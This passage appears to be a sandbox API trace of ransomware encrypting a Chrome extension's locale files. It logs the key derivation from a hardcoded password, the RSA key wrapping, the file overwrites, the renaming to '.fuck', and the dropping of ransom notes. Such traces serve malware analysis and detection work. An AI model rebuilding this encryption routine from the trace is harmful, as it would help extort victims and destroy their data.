pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.278] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.278] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12228) returned 1 [0255.279] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12228, dwCertEncodingType=0x1, pInfo=0x298fb90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298fbc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298fbc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18fe8) returned 1 [0255.279] CryptEncrypt (in: hKey=0x2e18fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.279] CryptEncrypt (in: hKey=0x2e18fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11ab8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11ab8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.279] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11ab8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11ab8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.280] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x1c3, lpOverlapped=0x0) returned 1 [0255.281] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x1c3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x1d0) returned 1 [0255.281] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1d0, lpOverlapped=0x0) returned 1 [0255.281] CloseHandle (hObject=0x5d5c) returned 1 [0255.282] CloseHandle (hObject=0x5d60) returned 1 [0255.282] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), bFailIfExists=0) returned 1 [0255.285] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json", dwFileAttributes=0x0) returned 1 [0255.286] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg")) returned 1 [0255.287] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.fuck")) returned 1 [0255.288] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.288] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.288] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.288] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.288] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.288] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\readme_back_files.htm")) returned 0xffffffff [0255.289] AreFileApisANSI () returned 1 [0255.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.289] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.289] GetFileType (hFile=0x5d50) returned 0x1 [0255.290] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.291] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.291] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0255.293] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.293] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.293] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.293] GetLastError () returned 0x0 [0255.293] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json")) returned 0x20 [0255.293] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json", dwFileAttributes=0x80) returned 1 [0255.294] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.295] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.295] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.296] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.298] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.298] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.298] CryptHashData (hHash=0x2e18828, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.298] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e186a8) returned 1 [0255.298] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.298] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.298] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11788) returned 1 [0255.299] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11788, dwCertEncodingType=0x1, pInfo=0x29902e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990310*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990318*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18da8) returned 1 [0255.299] CryptEncrypt (in: hKey=0x2e18da8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.299] CryptEncrypt (in: hKey=0x2e18da8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11de8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11de8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e11de8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11de8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x12c, lpOverlapped=0x0) returned 1 [0255.302] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x12c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0255.302] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0255.302] CloseHandle (hObject=0x5d60) returned 1 [0255.302] CloseHandle (hObject=0x5d5c) returned 1 [0255.302] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), bFailIfExists=0) returned 1 [0255.305] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json", dwFileAttributes=0x0) returned 1 [0255.306] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.gsg")) returned 1 [0255.309] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.fuck")) returned 1 [0255.310] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.310] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0255.310] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.310] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.311] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0255.311] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\readme_back_files.htm")) returned 0xffffffff [0255.311] AreFileApisANSI () returned 1 [0255.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.311] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.312] GetFileType (hFile=0x5d50) returned 0x1 [0255.312] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.313] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.313] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.313] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.313] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.313] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.313] GetLastError () returned 0x0 [0255.314] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json")) returned 0x20 [0255.314] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0255.314] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.315] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.317] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.317] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.320] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.320] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.320] CryptHashData (hHash=0x2e186a8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.320] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e180e8) returned 1 [0255.320] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.320] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.320] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11c50) returned 1 [0255.321] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11c50, dwCertEncodingType=0x1, pInfo=0x2990a30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990a60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990a68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18928) returned 1 [0255.321] CryptEncrypt (in: hKey=0x2e18928, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.321] CryptEncrypt (in: hKey=0x2e18928, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11568*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11568*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.321] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11568*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11568*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.322] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcb, lpOverlapped=0x0) returned 1 [0255.324] CryptEncrypt (in: hKey=0x2e180e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.324] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.324] CloseHandle (hObject=0x5d5c) returned 1 [0255.324] CloseHandle (hObject=0x5d60) returned 1 [0255.325] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg"), 